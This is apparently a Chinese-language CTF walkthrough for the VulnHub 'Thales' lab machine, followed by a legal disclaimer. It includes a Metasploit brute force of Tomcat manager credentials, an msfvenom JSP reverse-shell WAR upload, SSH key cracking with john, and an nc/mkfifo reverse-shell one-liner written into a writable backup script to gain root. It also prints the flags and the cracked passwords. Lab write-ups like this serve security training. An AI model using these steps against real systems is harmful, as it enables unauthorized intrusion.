下载地址:https://www.vulnhub.com/entry/thales-1,749/选择镜像文件进行下载。下载后解压是一个ova文件,在虚拟机中选择-打开虚拟机,选择此文件,然后修改系统网卡为NAT,在高级选项中注意网卡的MAC地址,方便后续查出本机IP。
文件名:Thales.zip
文件大小:2.2 GB
MD5:3645DD82FF243CE57F245EBEB83055DC
SHA1:8BC1B7E6D435ED3584151345D118161DBE1DF8BE
未探测出IP地址,需要重新配置。
1. 设置虚拟机网络为 NAT 模式
在 VMware 中,将 Kali Linux 和 靶机 都设置为 NAT 模式,以确保它们能通过宿主机共享网络连接。
2. 启动靶机并进入单用户模式
启动靶机,在出现蓝色引导界面时,按下 e 键进入编辑模式(若无法进入编辑模式,长按shift进入引导页面再按e进入)。
3. 修改启动参数
在编辑界面中,找到并修改启动项,将包含的 ro(只读)修改为 rw(读写),并且在参数末尾添加signie init=/bin/bash,使其进入单用户模式。
这样修改后,按下 Ctrl + X 启动系统。
4. 修改网卡名称
进入网络配置文件目录:cd /etc/netplan/。
因i键输入有问题,至此vim无法使用。使用nano命令打开00-installer-config.yaml文件,将网卡名称改为ens33。
修改完成后 Ctrl+x 退出,y 保存,然后直接回车即可。
5. 完成配置并重启系统
完成网络配置后,进行系统关机并重启。注意: 必须关机重启,而不是仅仅重启网络服务,因为有些端口可能尚未打开,只有重启系统后,端口才会完全生效。
获取root权限。共两个flag文件。
user.txt:a837c0b5d2a8a07225fd9905f5a0e9c4
root.txt:3a1c85bebf8833b0ecae900fb8598b17
确定IP地址、端口扫描、网站访问、目录扫描、爆破Tomcat。
使用nmap确定该靶场IP地址,地址为:192.168.241.165。
namp -sP 192.168.241.0/24
使用nmap进行端口扫描,发现其开放22和8080端口。
OpenSSH版本为7.6p1,Tomcat版本为9.0.52。
nmap -sV -v -T4 -A -P 192.168.241.165
访问8080端口,发现是Tomcat服务首页。
且发现登录页面。
经过目录扫描,并未发现可用信息。
Tomcat有登录窗口,使用MSF工具进行暴力破解。
得到用户名和密码为:tomcat/role1
search tomcat login
use 0
set rhosts 192.168.241.165
run
[+] 192.168.241.165:8080 - Login Successful: tomcat:role1
网站登录、上传shell文件、反弹shell、查看权限、查看其他用户信息、爆破密码、切换thales用户、获得第一个flag。
使用爆破的Tomcat账密登录。
从服务器信息可以看到Tomcat版本、JVM版本、操作系统版本等信息。
在“应用程序列表-Tomcat Web应用程序管理者-要部署的WAR文件”位置发现可进行文件上传。
使用MSF生成反弹shell文件。
msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.241.138 LPORT=9876 -f war -o shell.war
ls
开启临时http服务,下载该文件。
python -m http.server 1234
上传shell.war文件,进行部署。
上传失败,显示shell已存在。
重新生成一个war文件,进行上传。
上传成功。
开启端口监听,访问Ahshell页面。成功反弹shell。
nc -lvvp 9876
http://192.168.241.165:8080/Ahshell/
创建一个交互shell
python3 -c "import pty;pty.spawn('/bin/bash')"
Tomcat用户密码与登录密码不一致,无法查看
发现thales用户,并在用户目录下发现了txt文件。
发现一个backup.sh文件。
查看该文件内容,发现该文件可执行系统命令,对相关信息进行备份。
查看ssh文件,发现ssh密钥信息。
将SSH密码信息复制到kali Linux,并保存到OpenSSH.txt文件。
使用ssh2john转化ssh密钥为john可以破解的格式。
ssh2john OpenSSH.txt > OpenSSH-Jm.txt
使用john破解,得到thales用户的密码为:vodka06
john --wordlist=/usr/share/wordlists/rockyou.txt OpenSSH-Jm.txt
su thales
密码为vodka06
查看该用户目录下的文件信息,在user.txt文件夹下发现了第一个flag。
a837c0b5d2a8a07225fd9905f5a0e9c4
notes.txt提示到backup.sh文件,查看该文件信息,发现可读可写可执行。
写入shell、反弹shell、获得第二个flag。
在backup.sh文件写入反弹shell,然后执行改脚本。
因vim使用有问题,直接使用echo命令写入即可。
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.241.138 9645 >/tmp/f" >> backup.sh
因backup.sh文件内容损坏,重新写入完整内容。
echo '#!/bin/bash
######################################
# Backup to NFS mount script.
######################################
# What to backup.
backup_files="/opt/tomcat/"
# Where to backup to.
dest="/var/backups"
# Create archive filename.
day=$(date +%A)
hostname=$(hostname -s)
archive_file="$hostname-$day.tgz"
# Print start status message.
echo "Backing up $backup_files to $dest/$archive_file"
date
echo
# Backup the files using tar.
tar czf $dest/$archive_file $backup_files
# Print end status message.
echo
echo "Backup finished"
date
# Long listing of files in $dest to check file sizes.
ls -lh $dest' > /usr/local/bin/backup.sh
成功反弹shell,获取root权限。
nc -lvvp 9645
## ls
root.txt
## cat root.txt
3a1c85bebf8833b0ecae900fb8598b17
免责声明
本公众号“暗魂攻防实验室”致力于分享网络安全相关知识及资讯,所有内容仅供学习和交流使用,不得用于任何非法用途。由于传播、利用本公众号“暗魂攻防实验室”所提供的技术和信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号及作者不为此承担任何责任!!!
以下为本公众号声明内容,请知悉并遵守:
1.关于信息的准确性
本公众号所发布的信息均来源于公开渠道或作者整理,仅供参考,不保证内容的绝对准确性、完整性和时效性。使用者在依赖相关内容前,应独立核实信息的真实性和适用性。
2.法律与合规性
使用者应严格遵守国家相关法律法规,确保所有操作仅用于合法用途。本公众号明确禁止任何利用内容进行非法活动的行为,由此产生的后果由使用者自行承担,本公众号及作者不承担任何责任。
3.版权声明
本公众号部分内容如引用了他人作品或资源,均已标注来源或作者。如有侵权,请及时联系我们,我们将在核实后立即删除并致以歉意。
4.合法用途限制
本公众号内容仅供参考,任何利用本公众号内容从事违法行为的后果均由使用者自行承担,本公众号及作者对此不承担任何责任。
5.风险告知
因使用或传播本公众号内容导致的直接或间接后果(如系统损坏、数据丢失、法律责任等),均由使用者自行承担。本公众号及作者对此不承担任何责任。
今晨轻雾能见度较差 白天有雨需带好雨具
粤东珠三角局部有暴雨 粤北地区高温出没
暴雨频“上线” 开车出行安全贴士要记牢
四川大暴雨致灾性高 强降雨还将持续多久?
原文始发于微信公众号(暗魂攻防实验室):【渗透测试】Thales靶场渗透测试
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论